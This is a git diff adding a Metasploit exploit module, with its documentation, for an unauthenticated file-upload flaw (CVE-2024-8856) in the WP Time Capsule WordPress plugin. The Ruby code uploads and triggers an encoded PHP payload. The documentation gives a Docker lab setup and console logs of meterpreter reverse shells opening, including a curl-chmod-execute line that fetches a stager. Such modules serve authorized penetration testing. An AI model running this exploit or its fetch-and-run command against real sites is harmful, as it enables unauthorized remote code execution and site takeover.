diff --git a/data/wordlists/wp-exploitable-plugins.txt b/data/wordlists/wp-exploitable-plugins.txt
index 06c651ac4beb..1ab92752ab4e 100644
--- a/data/wordlists/wp-exploitable-plugins.txt
+++ b/data/wordlists/wp-exploitable-plugins.txt
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\ No newline at end of file
diff --git a/documentation/modules/exploit/multi/http/wp_time_capsule_file_upload_rce.md b/documentation/modules/exploit/multi/http/wp_time_capsule_file_upload_rce.md
new file mode 100644
index 000000000000..5ac807aa079f
--- /dev/null
+++ b/documentation/modules/exploit/multi/http/wp_time_capsule_file_upload_rce.md
@@ -0,0 +1,153 @@
+## Vulnerable Application
+This Metasploit module exploits a Remote Code Execution vulnerability in the WordPress WP Time Capsule plugin, versions <= 1.22.21.
+The vulnerability arises from an unauthenticated arbitrary file upload flaw due to improper validation logic in the plugin.
+To replicate a vulnerable environment for testing:
+1. Install WordPress using the provided Docker Compose configuration.
+2. Download and install the [WP Time Capsule plugin v1.22.21](https://downloads.wordpress.org/plugin/wp-time-capsule.1.22.21.zip).
+3. Verify that the plugin is activated and accessible on the local network.
+4. Register for a WP Time Capsule account and connect the plugin to an external storage system (e.g., Google Drive, Dropbox).
+5. Access `wp-admin/admin.php?page=wp-time-capsule-settings#wp-time-capsule-tab-advanced` to enable the **file upload functionality**
+by clicking **"Click here to show upload options"**.
+This action triggers the `prepare_file_upload_index_file_wptc` function, which creates the required `index.php` file
+in the `/wp-tcapsule-bridge/upload/php/` directory, making the issue exploitable.
+## Docker Compose Configuration
+version: '3.1'
+  wordpress:
+    image: wordpress:6.3.2
+    restart: always
+    ports:
+      - 5555:80
+    environment:
+      WORDPRESS_DB_USER: root
+      WORDPRESS_DB_PASSWORD: dummy_password
+      WORDPRESS_DB_NAME: exploit_market
+    mem_limit: 8G
+    volumes:
+      - wordpress:/var/www/html
+      - ./custom.ini:/usr/local/etc/php/conf.d/custom.ini
+  db:
+    image: mysql:5.7
+    restart: always
+    environment:
+      MYSQL_DATABASE: exploit_market
+      MYSQL_USER: root
+      MYSQL_PASSWORD: dummy_password
+    volumes:
+      - db:/var/lib/mysql
+  wordpress:
+  db:
+Create a `custom.ini` file with the following content:
+upload_max_filesize = 64M
+post_max_size = 64M
+## Verification Steps
+1. Set up a WordPress instance with the WP Time Capsule plugin (version 1.22.21) using the provided `docker-compose.yml`.
+2. Launch `msfconsole` in your Metasploit framework.
+3. Use the module: `use exploit/multi/http/wp_time_capsule_file_upload_rce`.
+4. Set `RHOSTS` to the IP address or hostname of the target.
+5. Configure necessary options such as `TARGETURI`, `SSL`, and `RPORT`.
+6. Execute the exploit using the `run` or `exploit` command.
+7. If the target is vulnerable, the module will execute the specified payload and return a session.
+## Options
+No additional options are required beyond the default ones provided in Metasploit.
+## Scenarios
+### Successful Exploitation Against WordPress with WP Time Capsule 1.22.21
+- Local WordPress instance with WP Time Capsule version 1.22.21.
+- Metasploit Framework.
+1. Start `msfconsole`.
+2. Load the module:
+use exploit/multi/http/wp_time_capsule_file_upload_rce
+3. Set `RHOSTS` to the target's IP (e.g., ``).
+4. Configure other necessary options (e.g., `TARGETURI`).
+5. Launch the exploit:
+**Expected Results**:
+With `php/meterpreter/reverse_tcp`:
+msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > run
+[*] Started reverse TCP handler on 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking /wp-content/plugins/wp-time-capsule/readme.txt
+[*] Found version 1.22.21 in the plugin
+[+] The target appears to be vulnerable. WP Time Capsule plugin appears to be vulnerable.
+[*] Uploading payload: rJ.php with MIME type: message/http...
+[+] Payload uploaded successfully. Parsing response...
+[*] Triggering the payload at:
+[*] Sending stage (40004 bytes) to
+[+] Deleted rJ.php
+[*] Meterpreter session 3 opened ( -> at 2024-12-11 00:48:18 +0100
+meterpreter > sysinfo 
+Computer    : 0bd3f3b7102e
+OS          : Linux 0bd3f3b7102e 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
+Meterpreter : php/linux
+With `cmd/linux/http/x64/meterpreter/reverse_tcp`:
+msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > run
+[*] Command to run on remote host: curl -so ./EHsooyPGi; chmod +x ./EHsooyPGi; ./EHsooyPGi &
+[*] Fetch handler listening on
+[*] HTTP server started
+[*] Adding resource /LoPlnjEpeOexZNVppn6cAA
+[*] Started reverse TCP handler on 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking /wp-content/plugins/wp-time-capsule/readme.txt
+[*] Found version 1.22.21 in the plugin
+[+] The target appears to be vulnerable. WP Time Capsule plugin appears to be vulnerable.
+[*] Uploading payload: Ps.php with MIME type: application/zip...
+[+] Payload uploaded successfully. Parsing response...
+[*] Triggering the payload at:
+[*] Client requested /LoPlnjEpeOexZNVppn6cAA
+[*] Sending payload to (curl/7.74.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to
+[+] Deleted Ps.php
+[*] Meterpreter session 4 opened ( -> at 2024-12-11 01:06:52 +0100
+meterpreter > sysinfo 
+Computer     :
+OS           : Debian 11.8 (Linux 5.15.0-126-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
diff --git a/modules/exploits/multi/http/wp_time_capsule_file_upload_rce.rb b/modules/exploits/multi/http/wp_time_capsule_file_upload_rce.rb
new file mode 100644
index 000000000000..13b9b8be8988
--- /dev/null
+++ b/modules/exploits/multi/http/wp_time_capsule_file_upload_rce.rb
@@ -0,0 +1,147 @@
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Payload::Php
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  prepend Msf::Exploit::Remote::AutoCheck
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'WordPress WP Time Capsule Arbitrary File Upload to RCE',
+        'Description' => %q{
+          This module exploits an arbitrary file upload vulnerability in the WordPress WP Time Capsule plugin
+          (versions <= 1.22.21). The vulnerability allows uploading a malicious PHP file to achieve remote
+          code execution (RCE).
+          The validation logic in the vulnerable function improperly checks for allowed extensions.
+          If no valid extension is found, the check can be bypassed by using a filename of specific length
+          (e.g., "00.php") matching the length of allowed extensions like ".crypt".
+        },
+        'Author' => [
+          'Valentin Lobstein',  # Metasploit module
+          'Rein Daelman'        # Vulnerability discovery
+        ],
+        'References' => [
+          ['CVE', '2024-8856'],
+          ['URL', 'https://hacked.be/posts/CVE-2024-8856'],
+          ['URL', 'https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-time-capsule/backup-and-staging-by-wp-time-capsule-12221-unauthenticated-arbitrary-file-upload']
+        ],
+        'License' => MSF_LICENSE,
+        'Privileged' => false,
+        'Platform' => %w[php unix linux win],
+        'Arch' => [ARCH_PHP, ARCH_CMD],
+        'Targets' => [
+          [
+            'PHP In-Memory', {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP
+              # tested with php/meterpreter/reverse_tcp
+            }
+          ],
+          [
+            'Unix/Linux Command Shell', {
+              'Platform' => %w[unix linux],
+              'Arch' => ARCH_CMD
+              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
+            }
+          ],
+          [
+            'Windows Command Shell', {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD
+              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2024-11-15',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+  end
+  def php_exec_cmd(encoded_payload)
+    dis = '$' + Rex::RandomIdentifier::Generator.new.generate
+    b64_encoded_payload = Rex::Text.encode_base64(encoded_payload)
+    shell = <<-END_OF_PHP_CODE
+    #{php_preamble(disabled_varname: dis)}
+    $cmd = base64_decode("#{b64_encoded_payload}");
+    #{php_system_block(cmd_varname: '$cmd', disabled_varname: dis)}
+    return Rex::Text.compress(shell)
+  end
+  def check
+    return CheckCode::Unknown('The WordPress site does not appear to be online.') unless wordpress_and_online?
+    plugin_check = check_plugin_version_from_readme('wp-time-capsule', '1.22.22')
+    case plugin_check.code
+    when 'appears'
+      return CheckCode::Appears('WP Time Capsule plugin appears to be vulnerable.')
+    when 'safe'
+      return CheckCode::Safe('WP Time Capsule plugin is patched or not vulnerable.')
+    end
+    CheckCode::Unknown('No vulnerable plugins were detected.')
+  end
+  def exploit
+    base_path = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-time-capsule', 'wp-tcapsule-bridge', 'upload', 'php')
+    upload_path = normalize_uri(base_path, 'index.php')
+    # Generate random filename matching constraints (6 characters total, ending in .php)
+    filename_prefix = Rex::Text.rand_text_alphanumeric(2)
+    payload_name = "#{filename_prefix}.php"
+    random_mime_type = Faker::File.mime_type
+    phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
+    b64_payload = '<?php ' + framework.encoders.create('php/base64').encode(phped_payload)
+    register_files_for_cleanup(payload_name)
+    vprint_status("Uploading payload: #{payload_name} with MIME type: #{random_mime_type}...")
+    mime = Rex::MIME::Message.new
+    mime.add_part(b64_payload, random_mime_type, nil, "form-data; name=files; filename=#{payload_name}")
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => upload_path,
+      'ctype' => 'multipart/form-data; boundary=' + mime.bound,
+      'data' => mime.to_s
+    )
+    unless res&.code == 200
+      fail_with(Failure::UnexpectedReply, 'Non-200 HTTP response received while trying to upload payload')
+    end
+    vprint_good('Payload uploaded successfully. Parsing response...')
+    json_response = res.get_json_document
+    url = json_response.dig('files', 0, 'url')
+    fail_with(Failure::UnexpectedReply, "Failed to extract URL from response. Response body: #{res.body}") if url.nil?
+    vprint_status("Triggering the payload at: #{url}")
+    send_request_cgi(
+      'method' => 'GET',
+      'uri' => URI(url).path
+    )
+  end